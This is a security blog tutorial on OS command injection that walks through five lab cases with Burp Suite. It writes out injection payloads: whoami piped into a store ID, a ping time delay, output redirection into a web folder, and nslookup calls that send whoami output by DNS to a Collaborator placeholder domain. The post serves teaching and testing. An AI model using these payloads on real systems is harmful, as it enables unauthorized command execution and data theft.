What is OS Command Injection ?
Well!!! Hello everyone! It’s ravitbughunter Back again I hope you all doing very well . today we will learn command injection .Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application
Types of OS Command Injection :
- OS command injection, simple case
- Blind OS command injection with time delays
- Blind OS command injection with output redirection
- Blind OS command injection with out-of-band interaction
- Blind OS command injection with out-of-band data exfiltration
1.Os Command injection , Simple case
Description: The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response.
Steps to reproduce:
- Use Burp Suite to intercept and modify a request that checks the stock level.
- Modify the
storeID
parameter, giving it the value1|whoami
- Observe that the response contains the name of the current user
When you see whoami
response means this website is vulnerable.
2. Blind OS command injection with time delays
Description: The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. To the vulnerability exploit the blind OS command injection vulnerability to cause a 10 second delay.
Steps to Reproduce:
- Use Burp Suite to intercept and modify the request that submits feedback.
- Modify the
email
parameter, changing it to:email=x||ping+-c+10+127.0.0.1||
- Observe that the response takes 10 seconds to return.
3. Blind OS command injection with output redirection.
Description: The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:
Steps to Reproduce:
- Use Burp Suite to intercept and modify the request that submits feedback.
- Modify the
email
parameter, changing it to:email=||whoami>/var/www/images/output.txt||
- Now use Burp Suite to intercept and modify the request that loads an image of a product.
- Modify the
filename
parameter, changing the value to the name of the file you specified for the output of the injected command:filename=output.txt
- Observe that the response contains the output from the injected command.
4. Blind OS command injection with out-of-band interaction:
Description: The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.
Steps to Reproduce:
- Use Burp Suite to intercept and modify the request that submits feedback.
- Modify the
email
parameter, changing it to:email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
- Right-click and select “Insert Collaborator payload” to insert a Burp Collaborator subdomain where indicated in the modified
email
parameter.
5. Blind OS command injection with out-of-band data exfiltration:
Description: The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain. For this vulnerability execute the whoami
command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to find of vulnerability.
Note: To find vulnerability , you must use Burp Collaborator’s default public server.
Steps to Reproduce:
- Use Burp Suite Professional to intercept and modify the request that submits feedback.
- Go to the Collaborator tab.
- Modify the
email
parameter, changing it to something like the following, but insert your Burp Collaborator subdomain where indicated:email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||
- Go back to the Collaborator tab, and click “Poll now”. You should see some DNS interactions that were initiated by the application as the result of your payload. If you don’t see any interactions listed, wait a few seconds and try again, since the server-side command is executed asynchronously.
- Observe that the output from your command appears in the subdomain of the interaction, and you can view this within the Collaborator tab. The full domain name that was looked up is shown in the Description tab for the interaction.
- To find vulnerability , enter the name of the current user.
Impact:
A command injection vulnerability allows attackers to execute arbitrary system commands on the attacked party’s host operating system
Thanks for connecting with Hackerinthehouse.
See you in Next Post.